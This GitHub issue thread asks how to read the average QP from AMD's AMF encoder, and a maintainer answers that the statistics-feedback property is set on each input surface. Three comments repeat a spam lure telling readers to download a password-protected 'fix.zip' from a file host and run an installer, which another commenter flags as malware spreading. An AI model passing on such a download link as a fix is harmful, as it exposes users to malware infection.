### ISSUE TITLE
[Question]: How to get calculated QP in a picture?

### ISSUE THREAD

**Issue by MemeTao** [GPUOpen-LibrariesAndSDKs/AMF#496]
Can i get QP directly from amf api ?

Currently i used following code but not works:
```c++
// before encode
setProperty(encoder, AMF_VIDEO_ENCODER_STATISTICS_FEEDBACK, true);
...
uint64_t average_qp = 0;
pkt->GetProperty(AMF_VIDEO_ENCODER_STATISTIC_AVERAGE_QP, &average_qp); // not works
````

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
yes I was tricked by this too

**Comment by DimkaTsv** [comment]
>yes I was tricked by this too
Well, sorry, but before you sent answer i already reported you as hacked account spreading malvare.

Anyways, back to topic. It seems like VCEEnc developer rigaya does it this way,but similar fragment with slightly different last line encounters several times, so idk which one is one that is closest to your case. 

```
uint32_t value32 = 0;
if (buffer->GetProperty(AMF_PARAM_STATISTIC_AVERAGE_QP(m_encCodec), &value32) == AMF_OK) {
    output->setAvgQP(value32);
```

But i am not coder, so i just found snippet that seems to be helpful to your question.

**Comment by MikhailAMD** [comment]
AMF_VIDEO_ENCODER_STATISTICS_FEEDBACK needs to be set on input surface every time, not on encoder.

**Comment by MemeTao** [comment]
> AMF_VIDEO_ENCODER_STATISTICS_FEEDBACK needs to be set on input surface every time, not on encoder.

thanks!
